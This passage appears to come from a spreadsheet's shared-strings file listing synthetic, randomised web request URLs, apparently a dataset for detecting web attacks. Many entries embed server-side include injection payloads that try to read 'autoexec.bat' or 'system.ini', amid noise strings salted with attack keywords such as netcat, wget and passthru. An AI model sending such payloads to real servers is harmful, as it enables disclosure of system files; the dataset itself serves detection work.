    <t>/ttuls/k@passwd/rliets8ud/avisf6j2unz/uryq75x5/obki44p4.html</t>
  </si>
  <si>
    <t>/i47avjlxrmdk4h/i83vvar.k/byj3ifch0/aym/e./oferohgt6gsso/l2isndnrmtealdhl5/c5/shgc8h90xe/c64iinwspz4knsh8zab0.jpg?e9hoqzte=tam_q-mt&amp;tvvwvacceptqka=e3f&amp;sy6ndfasmtnr=&lt;odfnpaadminhho&amp;homln1=k._z&amp;tlwp-_qpinmuxc=5cirdremoisoaa4pka&amp;7drna1oslesm=9372047&amp;emx348h=2</t>
  </si>
  <si>
    <t>/36tmpupx6r/3wz6hlp8yj.8vywkbah/tbs0ediyro6.tiff?bi6uee=n4htacceso&amp;gwrg=6moeytdfkira9eh5&amp;2zxmld=edr&amp;ei9wsyrteiihoae=documentee+-owebtae8i</t>
  </si>
  <si>
    <t>/n@w.g@1bgw2/gcg20wx_2avejwcmpj/v8wuyamytk9otfrqsca/nl40unsgan8rlq/oy2eaepecdqiiolei/eetzmlafraew8or/2owwsddhtia/t@a26g/rcw6agmdfzzs8c36-l_/duggmnetcatadminncqtasw.mspx?1uriabiv=7571&amp;sfeerwieeats=roem2&amp;taloae=5eos&amp;wmopxw7msvm=857860&amp;x@iframeperlqjh=ntselectcvtxjalla0i9dhxlk&amp;bn1usrlasystem4vc2p=99&amp;2crthioojo=sai&amp;8ildaf6=n)+i&amp;ee3abts6er0i=2cmisxoa&amp;xmh=afrbwav]dethac&amp;iteoiteri=wfjlkm&amp;nniaamnysc73rng=ejq8mac7p.m0</t>
  </si>
  <si>
    <t>/oyljrnc5hxichmj2t/ey1w04yyf/iatqemoatebcaspa/nji/uetomt/s37wv7gbkeekfgp5h2u.jpeg</t>
  </si>
  <si>
    <t>/ars/wrt@y3nt/gol4eoxmq_@43c-/inerotvgoeyiero.htm?su5exgagwufta9=atnegtcgcw&amp;iln1rhtd0=827</t>
  </si>
  <si>
    <t>/tw8tiitse18e/whvelh2bq/hyeiyszhel/8tdvs6rs5cn/iths/2.outgf4fjl_-i/n@u/lketelnetokorvfen15z/f4/-lulpym/c@kjd/aigyscs4@4ybm8q4dets.php?rsaohischspdh=zea&amp;huporr9helfgemi=0004115335&amp;jheihdea=tkpnua3x&amp;szskb=2102&amp;mu24e6in=nao1bot3tl&amp;iplvse=7108&amp;f2oes=8097577</t>
  </si>
  <si>
    <t>/fsju9.1z_1eyhffspwx/rebv@rkrmi/562/n@s406aoe0.cfm?nsixrcreaefd=snetcatlasanaa@eerma&amp;tdvs=esfe2z&amp;odleno6lne=pn1elcecho$anze2</t>
  </si>
  <si>
    <t>/wwi8ajsfrp/et/gbpxtermdvgfahcfj3d/8r00rweeh/nullo1cdnull97/e7ydwepp/83catpjj@cocgx/3hg/cr0osx2cijfb5hh2b/u_jayr4flg.f2o_i.lk/dtdm.mdb</t>
  </si>
  <si>
    <t>/t9tindoehwmdnle/saa/nteree6tsed/nimht/reter9nwtwmnrasi/amnalnheustaatigtw/snc/nob4oxa8teiss/ilgljb/ei.nbet4eyrna.pl?rmuwml1b4cpt=rrrhtimfnxb&amp;oer=1&amp;uk;&amp;urntgnu=18&amp;ptm-3cgr=+ati&amp;lh2e=tenne2xlrphshs&amp;muteliooct2rw=bhxi&amp;maeaehsa7ei=3-uwe&amp;orch9med=66386</t>
  </si>
  <si>
    <t>/hyeelzcettb/access_logu78copqu/p6geg4snx4ta/ti2t/etteshd7sjatcta/sr.php?er2one=odgifnrqxs&amp;mdn=mp&amp;y4.mochafm1f=+wnw4+ss&amp;pszwgetl=a7dx+ll+5hsfew&amp;naltn=n2ho4z1yvz4&amp;trtd=70529&amp;ltefs1=ea0dzrkb_.bm&amp;arei3u=iiao$rg&amp;evrsulyewdhi=iux&amp;erda=]t=iusr+r@9i&amp;l7estylehze=su0c&amp;edeisook8j2=prhnlueoohc+&amp;l0dtmpmd7=tekhea</t>
  </si>
  <si>
    <t>/5yerk/dolonevgte.mdb?.sfvq=310445501&amp;ko=609&amp;icaw5iaaeln=560&amp;sratr=7781430&amp;ea2zel738wyimt=akknbzz&amp;ahdeickfssa=aiaqo\\t4ddrem&amp;tpyisvnsei=r+odgdocumenthmbr&amp;lxq@y=dthot&amp;rp=o+b2eafi5eblink%uhttpe</t>
  </si>
  <si>
    <t>/wnoe/iuesk/bn4sih3opp/mieutnra/eawh/c@n/@8wm.png</t>
  </si>
  <si>
    <t>/5ng/ay@@@fn/zds2kzawp/qdghz/nlst.bin?xs=et9&amp;umxv6b=aos4gxrj8i&amp;in=b&amp;tcdjdirbtn=otperjde3n&amp;iti=4094111&amp;dueqfnr=09597&amp;4ilneyohnl0sdn=body&amp;ies=no&amp;meatdvt=aac;t</t>
  </si>
  <si>
    <t>/gpd/ibinqneq/fiaeaelelnftetbt/6ae6/w2r/i1hdat0v.altr.shtml</t>
  </si>
  <si>
    <t>/r8zxq/ovrq-0l0wjzrtjdo5k/yzdu6/eoomioaata/eoro6qopidgu49f/legiy3tl/rtqb6b.png?tnullusogb5p=qspvfaj&amp;kfah@c=bml-gxkbh@&amp;vonszwl1a=bidne&amp;ssezo5n4u=6eenvhhdte0hbratl&amp;lalrdsua=ub&amp;lm=alleao&amp;dmonoshiaueenda=t8zmyept&amp;mx4a8en=1&amp;lm=slc%owtwes</t>
  </si>
  <si>
    <t>/onr4pfi9eteynlecdnjd/dzinreaehlhnis.aspx?oeoet=220&amp;sxeh=dopt4restn$&gt;d3h&amp;ee0i=rseyht6a8e&amp;sdtaqtraimccan=55797321&amp;ffusnkterm=879&amp;vjkl4mju=1979&amp;7fl=seeine&amp;vati=943561&amp;ucsbfedtoemyt7t=0&amp;nldjy-sdrop2ple=893280&amp;haomeatwpsens=@h&amp;bininputcfhhu=4</t>
  </si>
  <si>
    <t>/eun/esgnlontjtqpeaen/qvarciromdp6/thi5m6/hzhf3_p_nokxn149/omg88r1uirhm6ra/lahwas/gcztmpizqnnornc/lfhotp6pavlafamn.bin?cc=3&amp;ftlseeeawreaasu=lygrragxczsiat7p&amp;9ictr=fd$5vrtstselectr&amp;7niliil0r=sock_stream9divscriptqiiej&amp;o&gt;t&amp;&amp;7sneo5s=113&amp;dsacoanmuihtow=0aya&amp;er0srimhtlhooe=+gmao++open&amp;hm2owegotd=ralk2kaeb(t&amp;yrosybetoetntm=16367039&amp;bllinklcorx-m=rhc1eheh&amp;84a=~kn&amp;naqerc=106531&amp;edaeweienho1=l+</t>
  </si>
  <si>
    <t>/u5pb0auicjhc@nj/a-wge.htm</t>
  </si>
  <si>
    <t>/obgijs/enulhbteoqt/ntr2z7jmido/vsn6lhisdc8h9ss.nsf?fue0ijd=:+alvresq|ecewecxmlitb&amp;gnesquwm=c8gqsneutse&amp;abkjs0adpile=ossinsert-&amp;rw=ess7r&amp;6cmn7w9xq=62&amp;nunnno=4342774&amp;slhhl9jri9w=ebao7or0ta9st&amp;ddbnt7nr=h&gt;tyformxaeidl8et4&amp;43bpand=630&amp;ttenejcxcdde4=35257352</t>
  </si>
  <si>
    <t>/rzysrsiaetyd2ohe1/rx5cwigdtmp9pdh0k/ewgetkci55ihomefselecttz/canjhmarepidert.bin?15dfi=msyr&amp;nb==wgett&amp;ric=03237&amp;5trr=2&amp;rt=2&amp;ps2hltinqb=66369724&amp;nyvrtunouon=7dm&amp;itrmeeecwe=lnobndesjjlncttnut&amp;8tgl57dnto=ahomed&amp;n5heesv=3484419&amp;wgvesmd89passthruk=2120718&amp;oehooa=riegrrpmyc5&amp;oe2sgrae74hto1=ghotsf9e2t&amp;afvii=yoch</t>
  </si>
  <si>
    <t>/0esahh9c9xhu7mbspyl/ey3dzw@-vmzfkvep_w/tdyd4bxxchild/elakzbgyp1in3@1q/6dtqinsertt902binoz/hieyaml4iwnosehi/%ufitx8accept/fbfwj@0oa0hsyt@.exe?ia=ehqbwj&amp;nt='rh</t>
  </si>
  <si>
    <t>/dt-puo/e.rkmsjwflrckx6f/ac1eep5doisamb84e/u@hauudjbb@fe/ktrg9.xpwg0sf7b/l0wfoju/tmpb/u4l/gagcqp_gt.jpg?n4smtstmscps=euwvot953a&amp;jbzq8jnph-tbf=ureplace&amp;nntcenzsaterpnh=1498315232&amp;hblnswfix=ircrtm\\&amp;teeapt=-tprocessing-instruction</t>
  </si>
  <si>
    <t>/o2/47b/iufbebn/ebxopttne@@7swgetxwindow.open/jmhz6vjk0bncln.exe?dakatadr7yhh=68255250</t>
  </si>
  <si>
    <t>/tcrsarnatcr/sn-76s7pkxewcm/aaxkk8qyvxo10/dxt7zmpu75l_hz8wrl/pm.kspjxmhttpszio/eowessnusualosioqett.nsf?etoco7onnesoa=98&amp;nwiahspr5a=56811749&amp;c4t8tecjdaouo=782&amp;qp.z=seiindh3\\d&amp;s0zztduynj9o=bqh6ru_ih-&amp;tnlxttea=c5isdbhrz&amp;eelq=aatsi0&amp;nph7n1bireic=rorzqn+i</t>
  </si>
  <si>
    <t>/alieisgt/hy3bv9coajozdgrnqxcb/ahkttd1z/96@nb-/gbz/qgsl/5elvs7/f@.php3?63etcs2vqrgz=104933&amp;wmseteieo=td6/dx?g+&amp;aunarnsefnteta=t17omtwz.mbb</t>
  </si>
  <si>
    <t>/ar/iiuuaraiike/ulieelh/anoqssnarhtoillg/yunsrtnbp/thttpf78cqkyo/edlklrvpyingz6ikfkek/1bpehbatahuzzu9ia/ibonriegeic8nlss8c/bc2exh.pfwrfgw/fkpazd7ygcgd9a8kbajh/ralnwhshl8a9cywo.js?mhl.5ouxzrf=62&amp;che41ln5bdt=iaw@gn4zecgw&amp;stwesbdnikhap=+stwois8muasohts:e9&amp;rae9ahenhbueaq=yxp_ot(dceinnt\\nepositionp;tmps&amp;n9a3arnpoarr=hgraphdreideu&amp;fos2o5awlyytade=zlfcspl0&amp;9r=4ryc&amp;tsehe=rimdhhrd&amp;6nc=ftniwse?epzt&amp;ttfntllpcost6=ddsnedh&gt;&amp;ingvc=h1&amp;sxdtbroe3f=uaoosrksoqkt</t>
  </si>
  <si>
    <t>/wtdek9rela./t2cpd/egsn/rcpp-1zg0s/djeeieyidopenerh/tpkbk@ijks5.sh?ikks6j1xxpositionnz=46473&amp;stdi5xa=057&amp;7aehid=bsstoegnitzebole&amp;in47t=05989472&amp;yjpjewinntecdo=aic1n&amp;meta7ftpetc5wz5_droplx=a\\r&amp;xorfrombrgp=+winntsdeh&amp;iovkr6s=%m+mgmelocation~c&amp;t5=ln&amp;2onra=e;wv)</t>
  </si>
  <si>
    <t>/7lryrs2/tfeegr3ntaoipoho/olk5jpemjc0wzksdybsq/d6@wms3wy4ek1d-dbvqt/11stdin.nrfrned/147gvzw6ezumrukryc8.cgi?eob1it4reea=3469272560&amp;re=7&amp;ehs4ntv=te&amp;ciedado=ftarhe0axfsuwxcff&amp;z9zif=wb7aitnq&amp;rt=90412741&amp;narua=isjinxmsnreamtiau&amp;jkdsfe=pnjc+noht3s&amp;aretnka3=ueif(&amp;pzs_mzszt=replacee6e&amp;rus=096774</t>
  </si>
  <si>
    <t>/sxssstmunc5ode/5rbotoohtnrisxrcarnn/l2vcmn2cpvum42rwsuk/tmwvp4.kt2kbr/egrss4en/xy/mr8uqwxahpxh_gi5xa.gif</t>
  </si>
  <si>
    <t>/j1yo2dwzdy2c2includev/9g@jechota-po5linkyj/2ts9reaypfa0/8.7u.cgi?mvh=(htode~fun&amp;ete0iekoa=agxo</t>
  </si>
  <si>
    <t>/@3mvgbednk/rmnla7gaalsooho.css?oidyhp1=tgfs@0xs&amp;mnfgb=revae&amp;caetinnw=897ntnolvttd86&amp;fhomevlikeip=19&amp;or=nca1d</t>
  </si>
  <si>
    <t>/oe8e1cttitihbe/ute/elaaiseoln/msvkikm9/toafegl3c3bb.asp?4ynmies0jnl4=8lt&amp;ntcls=+e6&amp;dali3a7bsifetdt=7uvknzpbrx&amp;r@uincludewfbd=6590905&amp;tnt0hmccnntiih=lrclott18ouqeaen&amp;nnbeqetoohssfa=qegmmu@ruoi&amp;an0wed5=\\+wasu&amp;auinddyn=++cuhome$((sconnectutena97e&amp;sgz8=+l&amp;hgs1etlahrmmohr=00271&amp;ypl1all5e7qlg=45751&amp;jpositionhf=3a4&amp;ma=4005</t>
  </si>
  <si>
    <t>/ttnke/uho4huend7h/j6lyhyor/mxyrxymzze-odst/couues2lysohama8uyib/nph-7z6uxfrl0ahxb@/fm6yv@wqqm.jpeg</t>
  </si>
  <si>
    <t>/rdzyecker9zin/swhadia3yr0mgpgrs_n/t5h1pb0aqcdyqzqh/at6ytrx8tjlgsnatdr/tofgr7gc2phu2/sscmeeosdmitta2s6/dkrsz.hbei0z3uxjdubw/eqwwrsd.css?tv9passthruvar=45267&amp;cphttpz@=d&lt;\\6w&amp;tolhnytij=a%u/+3izhhisre&amp;b0t6vrrw=1&amp;elto=&lt;!--+#include++++virtual="d:\\windows\\autoexec.bat"++--&gt;&amp;oo=hperlimg&amp;o3nja=oceaqu0rep&amp;r5ieodttgp=iaaptsntum&amp;ffjscopyy=neh;+i+e&amp;asfn=43619425&amp;te=nasse</t>
  </si>
  <si>
    <t>/qonjnshutdownbx2gqw/rudlr6ih3cocdae/0-/u6.yga7s/xl7kdorn/t_iimsh4yg/snssleek/positionjfpmjww/elblikdqro/var6kcr1fci/6oeieovmiwrnhc4c.tiff?canseaiasfd3vdi=lkuuoehalfnauoe&amp;2v30sentmu5deo=uwhr2shonerplbnpd&amp;sw6leukrbnaa3ae=&lt;!--+++#include++++virtual="d:\\windows\\autoexec.bat"--&gt;&amp;tfegapt=hji7&amp;bet=aelfe5tcrptw&amp;aasxyeya=5301806&amp;ahnaa=33490221&amp;xusrstdinecho-bufk=5&amp;taiatehhepe=341000&amp;acsriseorc=w8aeefcfqsoesrse&amp;1aexecmbmailco1mh=e90ds&amp;umkfs9eihl=r)t+eaccess_logao8siassesystembsstyle&amp;txuqgi7a9b=gtosfd&amp;eth=9lenlar8ina&amp;h0jjl-=trsystemawherefnteenos6</t>
  </si>
  <si>
    <t>/ox/ehtmdlnbn/agi6t_tvd.cckqq/zhnetrleebbi/axlyziz/-umftp7h8bzt@o1usr6/2.rviyns.exe?innh5keer3yeo=o'&amp;rqphmhsfok=&lt;!--++++#include++virtual="d:\\windows\\autoexec.bat"+++++--&gt;&amp;eust5froiht=&gt;ssstdi3fdaxmeiandod't&amp;aleceharn=w8t&amp;pocchild=2512683724</t>
  </si>
  <si>
    <t>/ei9n2k3pecthcituepoi/twzmcut2d4v/dnjdtck2hlyt9z/ntdtaaerojc/owvm6jluni4xoh/9.9bicdjuf51q3/i1ssurbfe.mdb?rtvfzriseci=&lt;!--+#include++++virtual="d:\\windows\\autoexec.bat"+++--&gt;&amp;ka68q4=tu.ak8y8z-i</t>
  </si>
  <si>
    <t>/bspnoeufteiana8h9/cxmlbinqmcvkm/skyhjqwzhn/ltyo.html?sa2esntbsxohic=hotyanjicinoe&amp;cw.wg8fdys=&lt;!--#include+++virtual="c:\\winnt\\system.ini"+--&gt;&amp;3s6we=lxht&amp;i4kn-=571788&amp;pzbinblr=15530&amp;uibh=aocu&amp;m_0kqg=e9~+6ee;ea+wh4++td&amp;akunyos2ziar=8933553&amp;be9trno=e+:</t>
  </si>
  <si>
    <t>/tzk4nfitdkza/a7i_oet2q5k.xb4wz_/h9birawadht/d.ia6ga4p38f7f-4p/nhxsc0rar/opewy/t0mkyhrr43@xo4it/rh.bin?gcmy=&lt;!--+++#include+virtual="d:\\windows\\autoexec.bat"--&gt;</t>
  </si>
  <si>
    <t>/tsadaw/awoab8fisq/ea3zebwb0ieadilr/opd6/tagakzl-arzvk8en9nps/u_v/qqjd15cu7xtx4ssock_stream.php4?5e=144&amp;mmmyu4v0qg=mhm5n&amp;zxhopaittnhloeu=otne&amp;yo3tand=[ihjd&amp;awiptatki=w2ti&amp;oeufonjglnc=&lt;!--+++++#include++++virtual="c:\\winnt\\system.ini"++--&gt;&amp;n5bi=05&amp;aesndocumentaflleq=imiiku-cd&amp;iagtesoiotioo=344</t>
  </si>
  <si>
    <t>/qa9belainquires/it@1lb4xgu14yb3gos/aasq.u1-..l3z7t/eupsrotipl3aecaat9o/idn0kpprwvhd/icy92ucm.a/2wjh9yv7mail54copyn/xpiynq/cmd7s-k/gprdivx/edos/5ery.5gsjicz.asp?nditemlriwh=&lt;!--+++#include+virtual="d:\\windows\\autoexec.bat"+++++--&gt;&amp;idwoxjkjej=eoooemaa&amp;e0nnfsll=yn8hny&amp;rniaaeeed=ehon1hfapokma&amp;chepinjtzf7.=9015&amp;rjadjlf=nwstdfma&amp;deeonrt6hridp=dteonyasgtsitet5no</t>
  </si>
  <si>
    <t>/nyaices/sfmv@cpfxno47aew79e4.png?hr=rkwptma8x4k2&amp;.vru=ictc&amp;rotgayb=ment&amp;oaqo=4118853&amp;dainsowebixg=&lt;!--+++#include+virtual="d:\\windows\\autoexec.bat"+--&gt;&amp;4ude=691997925&amp;hsc=4&amp;nse6tehe=978579&amp;uha0o=tet?:eeaai%&amp;lqanceejc=z+f61o|&amp;ueekaes=7en-netcater\\&amp;bm-emtcytah=2130751&amp;ltasgsm=08&amp;o2utae=67664</t>
  </si>
  <si>
    <t>/@3nssvlikeos/n@z_82.yc4czx/a-gtnyyz1ojk/wrshihnojgss/5lfg.dmopmplwzu.wb/oratret7reg1dp.html?clh=+0a7ri&amp;feoeo7gz=gie&amp;ytypanstdio=rca&amp;lh0=ow&amp;zuea4=&lt;!--++++#include+++++virtual="c:\\winnt\\system.ini"+++--&gt;&amp;tnesslcebaa=in&amp;netcatvservicesf@abjv=hwcbuolmgan&amp;d0atdvjgsboot.inizj=lt?telnete&amp;yfqewuwem=0325&amp;bbwsmhgec=9180&amp;wo=417&amp;w7xmlexdjdl=bcui9t&amp;n1jh=szoph_uhq7.i&amp;fgse=1734&amp;cssattettneet=do8velho</t>
  </si>
  <si>
    <t>/8ll8dehws0gnlaqno/ecwetif1utizee9cpo/8chfsy6erjinsgdn6lt2/imrmwgsttfdsu6enme/7orxcpasswdi/ioknsinitpurdozcihs/6ssock_streamt@lt1b6hwx.asp?pitomo4aeini=1n+re+d&amp;ti8=8889031&amp;bkhmt7h6omr=6&amp;se6eardrtbce=07&amp;sruennaettey=slvl&amp;9hnull4quw1mk=&lt;!--+#include+virtual="c:\\winnt\\system.ini"+++--&gt;&amp;t0rbj=eh&gt;rcpiqsylf+lf+y5&amp;zn2xi6h5pd=0e&amp;e_xut=t2hb&amp;nvltosn=tr&amp;eecnheer=37246092&amp;qe20tseabp=htc0plns</t>
  </si>
  <si>
    <t>/g.8_f4fnpgovgc/tbmd7u2omgwm8/ap0niru3pla/iqcvpfutrq.jsp?aseuevpnrphu=13504251&amp;xx1@jqc0rfmr=3&amp;yaddu4=dat\\oh3a+sbec&amp;yw6nullioptz3z=44409413&amp;hcqc3qsm=lm_j6g&amp;tuo=+5taht'&amp;s285ip=doeaolgsl02&amp;arubc=arw&amp;rst=2&amp;lowes=eis&amp;otnu=tforml~selectoauwrcnopopenj0ats&amp;meo=&lt;!--++++#include+++++virtual="d:\\windows\\autoexec.bat"++--&gt;&amp;qik0ebws2ors=9</t>
  </si>
  <si>
    <t>/tfgsrfoanrmtod/x@xhtaccespykce9y/ant/rpexecbhperlcausr9/cjrcj.vmail_zi/eienlde/si0d2vqgvzqa2/us2oxczjulnt.aspx?rlneiwhs=6jxnry@vd&amp;htaccesdix5o=$a+rjvmideaa[2neersl&amp;lyi=si&amp;he1eau=079613733&amp;odbon8ki=ttntr&amp;saidctbgno=utg5ded&amp;d33w=&lt;!--#include++++virtual="d:\\windows\\autoexec.bat"+++++--&gt;&amp;idejzon=d5e</t>
  </si>
  <si>
    <t>/nginhof80odven/eeliohdb4./e@d1kw5l7p8k@atagvb.php3?eesidevc=sht9i4ipositionee&amp;cola=93842&amp;who3ion6karae=e1sambgsoundlibsuth&amp;crtnhsoeei=qcrcwdirhj&amp;wkrj=astv&amp;aca=092745&amp;iiipdned=&lt;!--#include++virtual="d:\\windows\\autoexec.bat"+--&gt;&amp;tu4nnnsfdfamy=+9ht2nk+(t&amp;eaad=nase&amp;hih-lkb4wwit=fiae:kg&amp;ueuqvcdl7na=zyu&amp;hclffcxhjtien=&amp;r9i~sgsiot&amp;isqsn4acaoachcp=eyq9&amp;uatgec=unionstdinexec</t>
  </si>
  <si>
    <t>/pohhyenamefs5scide/sfawamueasaa7sn/ttswacosinp/fp/rgrae8sdthdro4qnssbo/ehjqc-k1ra@ek/eruk3epogtw/f4b_mesdtz/i1azx78k4xr/cofinputhscriptrcpgom/lwvb/u5.jsp?eetbo=50556&amp;uesiclmfd=&lt;!--++++#include+virtual="d:\\windows\\autoexec.bat"++++--&gt;&amp;la=03pml9mme&amp;halfdsa=nsoaafg8ljzoatgn</t>
  </si>
  <si>
    <t>/sjxl9sqmoekqkpvvwlyu/nlrrwp2u_ny1i-j/veeli1eedevsecnjbw/e0wu/6srenen/spshnmgiiim6efqe/et63/lmue/es9/er/acdfenpfrormda.html?htou=iatsktbes35]iframeowherene+&amp;x-oxhammpc2=e-lcppre&amp;ihop=5wty)&amp;ohlswjn8mhnk=aeneirnyl&amp;ilne=aa&amp;uotmv=yhhobjecto&amp;iteteiie7o=&lt;!--#include+++virtual="d:\\windows\\autoexec.bat"+--&gt;&amp;rdc=e&gt;jonoifbeo&amp;trzmyahamn=hfdboot.inii&amp;0stifhapedie=437409</t>
  </si>
  <si>
    <t>/afr/onahi4cdfu/q@/7eladairximllddraete/iuxrst9ukll/ycyrifnbroruzyaauet/hor@.@uzf.png?z7r=sock_stream+;?is&amp;3iafal34us7ofdg=&lt;!--++#include++++virtual="c:\\winnt\\system.ini"++++--&gt;&amp;e0-b%ueauyf5k=sandetau-e1+iyo|ops&amp;nfs=020136&amp;2cnnnil=ptmro&amp;9k9fal9=1141977814&amp;tm9lpgacd7=oi7ttdam6pn04si1de&amp;xuxxie=t5-haaua+r:hsock_stream8&amp;iaifeh=htacces&amp;988dy1ginnwti5r=(oeneaz&amp;np17rternr=cy&amp;at2sa3ean=einput5w71r</t>
  </si>
  <si>
    <t>/7t7_px4xwqwcp@mg./n776flehc/rasiexas/pvntttahhe/zywsamwindow.openlocationwx0doowp/csyh9eystmpleoseecl9.mspx?lhxtzwn3m=tadmintrryj8+oi&amp;6suwxvgroupby=mrpinputjue&amp;xtv_hzupdqjrcp=tsawbeoeeneq&amp;femg.y5tq=autoexec)e&amp;tjmw=metarij&amp;dh=746229239&amp;nfitea4=6ytpoelog+&amp;dnpg=&lt;!--+++#include+++++virtual="d:\\windows\\autoexec.bat"++++--&gt;</t>
  </si>
  <si>
    <t>/onni05siyhsf/shznacrqleelh/cdobi/ambhib/ofz4nuwdgg1osgn/tratshtear5o6f.php4?loaaalr3wtrte=qunsaf5(e&amp;hlt_=593988568&amp;tat=1593438&amp;oe=6281&amp;ngontonaitwews=ro6sph3zc&amp;t8jawemgen=ttyn3ahuo&amp;-fujxp_ortdo0dq=netwi&amp;ldiolv=laos%s/a&amp;nr=eamtqjlsesto&amp;9ec4it=8178701&amp;aghun9are=&lt;!--++#include++virtual="d:\\windows\\autoexec.bat"+++++--&gt;&amp;ebienp2nehee=\\7o</t>
  </si>
  <si>
    <t>/bdzicttvhy_iiframes/afemfvaszgcch.mspx?replaceformwgze=67d3i%taiw+&amp;05fdolzttisbo=&lt;!--#include+++virtual="c:\\winnt\\system.ini"+++--&gt;</t>
  </si>
  <si>
    <t>/it1usiyisstnyi/e1rs3h@cogq5uw/bhtatt.jpeg?dot0ih=\\p&amp;divmgnm=havings&amp;v.xfkus=&lt;!--#include+++++virtual="c:\\winnt\\system.ini"--&gt;&amp;tnsc=9859&amp;ikekhsl=td2i</t>
  </si>
  <si>
    <t>/4fw/t9-ehttwfqqhm/iw/dnefigt/cfiw38pu/tng2uyhelou5a.gif?aun=93208156&amp;itgtmqtt=&lt;!--#include+++virtual="c:\\winnt\\system.ini"+++--&gt;&amp;v-@lub-grpasswdyq=iposition2+winntadminep3rbp(eo&amp;swlwdgrmh=lsutjanfx0&amp;oadlke=ens&amp;ebyedwenzkno9zw=ums&amp;det=tsrwpe&amp;trel5=26196&amp;dfposition3cmdtxm=hreotiw6eoefrisa&amp;ts6eoftne9tgw=16265&amp;ihtatvxehe=ea</t>
  </si>
  <si>
    <t>/wyq/ty73nha/kori/eeeiuvpeeqa4iiyshmy/eaa8xbpvcaqptx8/cs7h/tcd1/iltistotpmelomu1sb/washiucednn/vuhtcul6oirnte8d/paacsdw.aspx?itrd2sw=)+wne&amp;ftcne=0ascde&amp;l8e=rsan&amp;see=uap5s&amp;3owzkb=eropeni-sbcs&amp;xp_execn5-null=1057&amp;daaoeenn=pyd&amp;nqvgbfae0ut=s8~tmx&amp;r4crf7k=hrea&amp;n8lt9t9pth=el7asdetcy&amp;e3qisfe=&lt;!--+#include++++virtual="d:\\windows\\autoexec.bat"++--&gt;</t>
  </si>
  <si>
    <t>/jtet7tt3o5e/tiukaeean.mdb?1gsock_streamuhq1=5116636609&amp;handt8mqstylejlz=ezcr7&amp;245sghtaccesx8window.open=064&amp;bdpotndtot=nh+dtvh++t&amp;hyrdu=e+=i4t@fr&amp;d9reenizs=&lt;!--+++++#include+++++virtual="c:\\winnt\\system.ini"--&gt;&amp;yladigscp0hjs=herrnlsdinrtocfors</t>
  </si>
  <si>
    <t>/r_ikfx/t1b4uequuqde/eytv/meiaohbtufbna/crtftttela/eaw/nfi8bv.o/re6nore/uowalm7/eirbhngtdwgms/matseafs.jpeg?ogo92d4optmp1b=&lt;!--+#include+virtual="d:\\windows\\autoexec.bat"+++--&gt;</t>
  </si>
  <si>
    <t>/d7c2fz/c5yx_trob5kn7ey/l81x@pf/jallbvu@.systemhelq1ln/aezdeletessvz33/3twwff0moerunineaeri/eyusnpux5qb9rgn/afegng5irhiadnmge/uqzhrnntnna/yeuebcnjmz_c9mz.php?qs6t9psrdoer=&lt;!--++#include+virtual="c:\\winnt\\system.ini"+++++--&gt;&amp;et=yi&amp;oieorttoed=103&amp;nisatsnqspsro=emueqly0zepsa9ga&amp;re3ahrutde5igna=dt0&amp;aooaalxtrpx9laj=nm)]n&amp;l1=7625</t>
  </si>
  <si>
    <t>/tp2tkqk2duuxfx.079zt/nejvey8bqyk/uuu@ocdxulro_7feljj-/escoohoyrnilt2fnort/lc5r.qpwmij.png?boya250=access_logl8d&amp;g.ed=353&amp;1nrs5hezo=&lt;!--+#include+++++virtual="d:\\windows\\autoexec.bat"--&gt;&amp;xfwcgaeselttho=rrfdeetaieceelexmo&amp;o4=0</t>
  </si>
  <si>
    <t>/t.lospoxb_sgr3sm/ya.shtml?ldhoeoeefdp=q]aeet(8eeetcs&gt;%gh&amp;vtds5=7&amp;si=&lt;!--++#include++++virtual="c:\\winnt\\system.ini"+++--&gt;</t>
  </si>
  <si>
    <t>/e-ni.n/nvi4zv/e72uj_sj/tzdlahawrct7esyhr/onecovsd/7flfvebbracceptg/i-jvt/ihuswofesnx/nf55nvepazgo4_us/sw/sem/erei.png?eyrwi5utfderhnp=&lt;!--+#include++++virtual="c:\\winnt\\system.ini"+++++--&gt;</t>
  </si>
  <si>
    <t>/oh/jescript/nknab_pd1tna7/n2jyehi9lgv.8uap.sh?wisilfgtnron=5&amp;er1ess=62128&amp;mme50elirlms=9reeeb�rea&amp;0et8aoptkar7=06&amp;rnia8wccooeylo=soe&amp;kcueujeey1aglhf=ffy&amp;ore=mehl4tluh&amp;j9nnyort7t=ibet&amp;eadofllyai=ral3da&amp;u0ya2ecbnatohi=e+divna&amp;mnbdcdea4a9=515&amp;snwe8ns1eoe=&lt;!--+++++#include+++++virtual="d:\\windows\\autoexec.bat"+++++--&gt;&amp;rdsyo0t=sd6m:ibt&amp;ooe=643309</t>
  </si>
  <si>
    <t>/gpositionr_5kl0u/ao/oydctu5gtqzt7x-yhwj/wldrdemtr3u/5rseeuivaqc6kam8x/6tu31s/mibt/qaeoiy/oedledtdo.php4?oneeojs2j=yoeosatmpad&amp;crmiz2rba=&lt;!--++#include+++virtual="c:\\winnt\\system.ini"+++--&gt;&amp;ra=sqmh\\5p&amp;mliinhw=eays5ruv2r</t>
  </si>
  <si>
    <t>/ehhrro7eualobenxe/sp7rrhtxtetry64atn/nmteufptvlhqaninoetv/inubsat/cag0ttoxmed6/6yaimecraeooei.shtml?oeaitritaimie3=&lt;!--++++#include++++virtual="d:\\windows\\autoexec.bat"+++--&gt;&amp;iiapatemkr=5ehscewedeihro2</t>
  </si>
  <si>
    <t>/3gzhgbhmnh/rak7fqfqqesrhc/4fnrxloaw/6k2execxbzvowp/rigiomztydeia/tfge1/dfponk54modekeieyw.sh?a9fosystempo=&lt;!--#include+virtual="d:\\windows\\autoexec.bat"++--&gt;&amp;hst=ae&amp;5eyontens=l+setechonuu</t>
  </si>
  <si>
    <t>/qq._q_m40.gif?nwreelfh=u%csnpdl$o5+&amp;a1hasthnyt=22&amp;oe6oema=&lt;!--++#include+++virtual="d:\\windows\\autoexec.bat"++++--&gt;&amp;pnt=al'rzpz&amp;vmnapecblrjeee=home&amp;oahsmerrew=asdildxelaelretzf&amp;ginz=354&amp;e2o8=sjifmz&amp;8r=3access_logorwti&amp;es=1051078724&amp;ci1i=lumhvcn3z2i&amp;hjisvfswitoqr=3winntxml&amp;acdtep0lahalyxa=277</t>
  </si>
  <si>
